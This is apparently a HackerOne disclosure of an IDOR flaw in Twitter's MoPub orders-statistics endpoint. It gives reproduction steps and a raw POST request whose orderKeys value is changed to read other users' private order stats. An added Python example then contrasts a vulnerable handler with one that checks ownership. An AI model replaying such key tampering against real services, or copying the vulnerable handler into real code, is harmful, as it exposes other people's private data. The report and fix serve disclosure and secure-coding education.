Twitter: IDOR and statistics leakage in Orders

ID H1:544329
Type hackerone
Reporter updatelap
Modified 2019-06-14T00:08:40


Description: Twitter's "MoPub" service has statistics dedicated to the results of an "Order"; after testing, the endpoint "" is shown to be affected by an "IDOR" bug,

which led to the leak of other users' private "Orders" statistics.

Steps To Reproduce:

  1. [Create an account in and log in]
  2. [Go to the link and create an Order]
  3. [Using this POST request you can disclose the statistics of other orders by changing the value of the orderKeys parameter in the request body]

```
POST /web-client/api/orders/stats/query HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: 
Content-Type: application/json
x-csrftoken: {TOKEN}
Content-Length: 98
Connection: close
Cookie: csrftoken={TOKEN}; sessionid={SID}; mp_mixpanel__c=1;

{"startTime":"2019-04-07","endTime":"2019-04-20","orderKeys":["43b29d60a9724fa9abbdc800044002d6"]}
```

{F472873}
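The bug class behind step 3, as an added example that is not part of the report and not MoPub's code: a vulnerable handler resolves the client-supplied orderKeys directly, so the session only proves who the caller is, while the hardened handler scopes the lookup to the session's account and rejects any key outside it with the same answer it gives for a non-existent key. The in-memory ORDERS table, the account ids, the order keys and all function names are constructed assumptions.

```python
"""Vulnerable vs. hardened handling of an orders-stats query keyed by
client-supplied order identifiers (the bug class in the report above).

Added illustration, not MoPub's code: the in-memory ORDERS table, the account
ids, the order keys and every function name here are constructed assumptions.
"""
from __future__ import annotations

import json
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Order:
    key: str
    account_id: str
    impressions: int
    revenue: float


# Constructed sample data: two advertiser accounts, each owning one order.
ORDERS = {
    "0a1b2c3d4e5f60718293a4b5c6d7e8f9": Order(
        "0a1b2c3d4e5f60718293a4b5c6d7e8f9", "acct-attacker", 1_200, 3.40),
    "f9e8d7c6b5a493827160f5e4d3c2b1a0": Order(
        "f9e8d7c6b5a493827160f5e4d3c2b1a0", "acct-victim", 98_000, 250.10),
}

# Order keys in the report are 32 lowercase hex characters; validate the shape
# before doing any lookup so garbage never reaches the data layer.
ORDER_KEY_RE = re.compile(r"^[0-9a-f]{32}$")


class Forbidden(Exception):
    """Raised when the caller asks for an order outside its own account."""


def stats_for(order: Order) -> dict:
    return {"impressions": order.impressions, "revenue": order.revenue}


def stats_query_vulnerable(session_account_id: str, order_keys: list[str]) -> dict:
    """IDOR: the session identifies the caller, but nothing checks that each
    requested key belongs to that caller's account."""
    return {k: stats_for(ORDERS[k]) for k in order_keys if k in ORDERS}


def stats_query_hardened(session_account_id: str, order_keys: list[str]) -> dict:
    """Scope the lookup to the caller's account before touching any stats."""
    owned = {k for k, o in ORDERS.items() if o.account_id == session_account_id}
    requested = set(order_keys)  # duplicates collapse harmlessly
    if not requested <= owned:
        # Reject the whole request instead of silently dropping foreign keys,
        # and answer identically for "not yours" and "does not exist" so the
        # endpoint cannot be used to enumerate valid order keys.
        raise Forbidden("one or more orderKeys are outside the caller's account")
    return {k: stats_for(ORDERS[k]) for k in requested}


def handle_stats_query(session_account_id: str, body: str) -> tuple[int, dict]:
    """Mimics the POST handler: parse a JSON body shaped like the report's,
    validate orderKeys, run the hardened query. Returns (status, response)."""
    try:
        payload = json.loads(body)
    except ValueError:
        return 400, {"error": "malformed JSON"}
    keys = payload.get("orderKeys") if isinstance(payload, dict) else None
    if (not isinstance(keys, list) or not keys
            or not all(isinstance(k, str) and ORDER_KEY_RE.match(k) for k in keys)):
        return 400, {"error": "orderKeys must be a non-empty list of 32-hex-char keys"}
    try:
        return 200, stats_query_hardened(session_account_id, keys)
    except Forbidden:
        return 403, {"error": "forbidden"}


if __name__ == "__main__":
    # The report's request body with the victim's (constructed) key swapped in.
    body = json.dumps({"startTime": "2019-04-07", "endTime": "2019-04-20",
                       "orderKeys": ["f9e8d7c6b5a493827160f5e4d3c2b1a0"]})
    print("vulnerable:", stats_query_vulnerable("acct-attacker",
                                                json.loads(body)["orderKeys"]))
    print("hardened:  ", handle_stats_query("acct-attacker", body))
```

The check that matters is the ownership filter being applied before the stats lookup, not after; filtering the result set afterwards still lets a timing or error difference confirm that a foreign key exists.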


leakage statistics